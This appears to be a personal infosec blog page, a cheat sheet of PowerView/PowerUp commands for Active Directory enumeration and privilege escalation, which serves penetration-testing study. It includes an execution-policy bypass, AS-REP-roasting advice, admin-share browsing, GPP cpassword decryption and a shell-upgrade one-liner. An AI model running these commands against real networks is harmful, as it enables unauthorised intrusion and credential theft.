akde/infosec

Information security is ultimately about managing risk

PowerSploit / PowerView

,
, , , ,

Col­lec­tion of privsec scripts. To start, upload PowerView.ps1 and:

powershell -exec bypass
PS> Import-Module .\PowerView.ps1

See the github site for all commands.

General enumeration

powershell -exec bypass
PS> . .\PowerUp.ps1
PS> Invoke-AllChecks

Or:

powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"

About users

Enu­mer­ates all users.

Get-NetUser

Enu­mer­ate all users which does not require Ker­beros preauth.

  • If there is any user list­ed, go AS-REP-roast them!
  • If there is no user list­ed: If you have Gener­icWrite or Gener­i­cAll per­mis­sions on anoth­er AD user account, try to use this priv­i­lege to dis­able Ker­beros preau­then­ti­ca­tion. Repeat this step afterwards.
Get-NetUser -PreauthNotRequired

Returns prop­er­ties for all users (if some are set)

Get-UserProperty

Obtain a list of cur­rent­ly logged on users

Get-NetLoggedon [-ComputerName $name]

Get all active ses­sions against the pre­vi­ous found Domain Con­troller dc01

Get-NetSession -ComputerName dc01

Returns the Domain Admins

Get-NetGroupMember

Get the last login and pass­word change date:

Get-NetUser | select cn,pwdlastset,lastlogon

About groups

Returns all local groups

Get-NetLocalGroup

Returns all groups

Get-NetGroup

Returns mem­bers of a group

Get-NetGroupMember $groupName

Returns all orga­ni­za­tion­al units. (!= groups)

Get-NetOU

Enu­mer­ates local admins on all domain systems

Invoke-EnumerateLocalAdmin

About computers

Enu­mer­ates the forest

Get-NetForest

About the DC of this system.

Get-NetDomainController

Returns all com­put­ers of this domain

Get-NetComputer
  • If there are some, try to browse them with­in Pow­er­Shell with­out mount­ing: 
    get-childitem "\\$computer\C$"

Enu­mer­ates all shares in the domain

Invoke-ShareFinder

Services

Shows active RDP sessions

Get-NetRDPSession

Helpers

Con­vert name into SID

Convert-NameToSid $name

Con­vert SID into name

Convert-SidToName $sid

Con­vert CPass­word from Groups.xml in the shared Repli­ca­tion direc­to­ry: (If this does­n’t work, just copy and past the func­tion from the code into the Pow­er­Shell con­sole and exe­cute it afterwards.)

PS> . .\Get-GPPPassword.ps1
PS> Get-DecryptedCpassword $cpasswd

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';